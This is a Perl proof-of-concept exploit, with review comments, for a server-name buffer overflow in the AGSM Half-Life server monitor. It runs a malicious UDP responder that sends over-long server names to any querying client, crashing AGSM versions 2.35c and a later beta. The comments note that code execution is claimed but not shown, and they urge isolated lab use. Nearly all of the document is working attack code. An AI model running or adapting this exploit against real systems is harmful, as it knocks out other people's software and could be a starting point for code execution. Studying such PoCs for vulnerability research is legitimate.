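#!/usr/bin/perl
#
# Dimetrius's proof-of-concept AGSM buffer overflow exploit.
#
# Works with the latest release (2.35c) and the latest beta.
# The developers provided no sources; the vulnerability is believed to be in
# the string buffer that holds the Half-Life server name: by malforming the
# server's query response we can return an arbitrary string as the server
# name to AGSM, which leads to a buffer overflow and possibly execution of
# arbitrary code.
#
# NOTE(review): this PoC only sends a plain 'A' filler. At most it
# demonstrates a crash (denial of service of the monitor); code execution is
# claimed by the original author, not demonstrated by this script.
#
#   v2.35c       - a server name of 66 or more bytes overflows
#   latest beta  - a server name of 148 or more bytes overflows
#
# Usage: perl <this script> [old|new] [port]
#   old   (default) send the 2.35c payload -- identical to the original PoC
#   new   send the latest-beta payload -- the original built it but never
#         sent it, which is why it is now selectable
#   port  UDP port to listen on, default 27015 (the Half-Life server port)
#
# The script binds a UDP socket on all interfaces and answers EVERY datagram
# it receives with the payload, so run it only on an isolated lab network
# where the target AGSM instance is the only client that can reach it.

use strict;
use warnings;
use IO::Socket;

# Overflow payloads keyed by the AGSM version they target. Both start with
# "\xff\xff\xff\xff" (presumably the 4-byte connectionless header of the
# Half-Life query protocol -- verify against the protocol spec) followed by
# "A\x00"; everything after that is the over-long server name. The byte
# strings are kept verbatim from the original PoC; check their lengths with
# length() before editing them (the start-up message prints the length).
my %payload_for = (
    # 2.35c: the original note says a 66-byte host name is enough to overflow.
    old => "\xff\xff\xff\xffA\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
    # latest beta: the original note says 148 bytes or more are needed.
    new => "\xff\xff\xff\xffA\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
);

# Command-line selection; with no arguments this behaves exactly like the
# original script (old payload, port 27015).
my $version = defined $ARGV[0] ? lc $ARGV[0] : 'old';
die "usage: $0 [old|new] [port]\n" unless exists $payload_for{$version};
my $portn = defined $ARGV[1] ? $ARGV[1] : 27015;
die "port must be a number between 1 and 65535\n"
    unless $portn =~ /\A\d+\z/ && $portn >= 1 && $portn <= 65535;

my $max = 3024;    # maximum bytes accepted per incoming datagram

my $sock = IO::Socket::INET->new(LocalPort => $portn, Proto => 'udp')
    or die "error: $@\n";
print "Monitoring connections...\n";
printf "Sending the '%s' payload (%d bytes) to every peer that queries port %d\n",
    $version, length $payload_for{$version}, $portn;

my $query;
while ($sock->recv($query, $max)) {
    # recv() records the sender as the socket's peer; the send() below has
    # no explicit destination and therefore replies to that peer.
    my (undef, $ipaddr) = sockaddr_in($sock->peername);
    my $agsm_ip = inet_ntoa($ipaddr);

    # The query comes from an untrusted network peer: reduce it to printable
    # ASCII before echoing it so a hostile sender cannot push terminal escape
    # sequences into our console.
    (my $shown = $query) =~ s/[^\x20-\x7e]/./g;
    print "$agsm_ip said: $shown\n";

    $sock->send($payload_for{$version}) or print "damn: $!\n";
}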